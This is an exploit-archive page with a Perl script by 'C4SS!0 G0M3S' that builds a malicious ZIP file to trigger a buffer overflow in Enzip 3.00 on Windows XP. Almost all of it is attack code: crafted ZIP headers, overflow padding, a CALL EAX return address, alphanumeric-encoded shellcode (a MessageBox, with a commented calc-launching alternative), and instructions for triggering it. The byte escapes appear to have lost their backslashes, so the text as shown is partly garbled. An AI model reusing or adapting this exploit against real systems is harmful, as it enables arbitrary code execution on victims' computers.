Enzip 3.00 Buffer Overflow

Posted on 07 January 2011
#[+]Exploit Title: Exploit Buffer Overflow Enzip 3.00
#[+]Date: 0162011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.bcuc.ac.uk/files/enzip300.exe
#[+]Version: 3.00
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#Create BY C4SS!0 G0M3S
#Louredo_@hotmail.com
#Website http://www.invasao.com.br
#
#
#HOW TO:
#
#OPEN THE FILE WITH THE SPECIALLY DESIGNED ENZIP 3.00
#THEN CLICK BUTTON TO THE RIGHT ON TOP OF THE FILE NAME
#SELECT OPTION THEN OPEN THE PROGRAM SHOWS IN MY CASE Shellcode is a MessageBox ()
#
#


if($#ARGV!=0)
{
system("cls");
system("color 4f");
sub usage
{
print "

".
"             ||========================================||
".
"             ||                                        ||
".
"             ||    Exploit Buffer Overflow Enzip 3.00  ||
".
"             ||    Created BY C4SS!0 G0M3S             ||
".
"             ||    Louredo_@hotmail.com                ||
".
"             ||                                        ||
".
"             ||========================================||


";


print "[+]Exploit: Exploit Buffer Overflow Enzip 3.00
";
print "[+]Date: 01\06\2011
";
print "[+]Author: C4SS!0 G0M3S
";
print "[+]Home: www.invasao.com.br
";
print "[+]Version: 3.00
";
print "[+]Tested On: WIN-XP SP3 Portuguese Brazilian
";
print "[+]E-mail: Louredo_@hotmail.com

";
print "[+]Note:

Read the comments above to Learn How to Exploit Works


";

}
usage;
print "[-]Usage: $0 <File Name>
";
print "[-]Exemple: $0 exploit.zip
";
exit(0);

}


my $ldf_header = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";
usage;
print "[*]Preparing payload
";
sleep(1);

my $payload = "x41" x 1024;
$payload .= "BBBB"; #VALUE DE EAX
$payload .= "CCCC"; #VALUE DE EDX
$payload .= "DDDD"; #VALUE DE ECX




$payload .= "x42" x 1022;
$payload .= pack('V',0x5D54296F); # CALL EAX COMCTL32.DLL



$payload .= "x43" x 40;


print "[*]Identifying the length Shellcode
";
sleep(1);

#
#
#SHELLCODE ENCODER USING ALPHA 2 BASEADDRESS EAX
#
#PROMPT:
#
#C:alpha> alpha2 --uppercase eax < File_name.txt
#
#

$shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI6SYP03O903XRWC9KPPRHR".
"LBL10Q03XWCP26N2DU8453CRE3BV4F8OKCKUMK0CL0PKO8SZ0P38R0R89QN3W6PZOK1O1TQTQB14Q0QS".
"X51E73UW22HPMCUSCT3PT0ZV2PPNYP0NNMPSLKON1VSYYVSN26SYKF1RHPSWP10WPSXQWP00MFSSXV3W".
"Q6PWPBHQ00CWDV3SXU4Q0W2RYRHRO3YD43UE8QU2XD0RLV4V9PSRHGQP0WPQ0CX73P4630SPT1KBJQP1".
"C0QPRKOHPVSYPPPONJZXJK1SLKON6A";
#
#
#OR THIS SHELLCODE WinExec("CALC.EXE",0)
#
#PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D
#46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X
#USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY
#41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT
#YK7OGT8FOPYLP3K8W5UCOM83KYZA
#
#



print "[*]The length is Shellcode:".length($shellcode)."
";
sleep(1);



$payload .= $shellcode;
$payload .= "x46" x (1568 - length($shellcode));


$payload .= "x52x58x66x05xB2x0Bx40x40".
"x40" x 10;
$payload .= "x50x98xd1";


$payload .= "x4a" x (4064 - length($payload));





$file = $ARGV[0];

$payload = $payload.".txt";
my $zip = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the File $file
";

open(f,">$file") or die("ERROR
$!
");
print f $zip;
close(f);
print "[*]The File $file was Successfully Created
";
sleep(1);
exit(0);
TOP
Malware :

Last 20
Exploits :

Last 20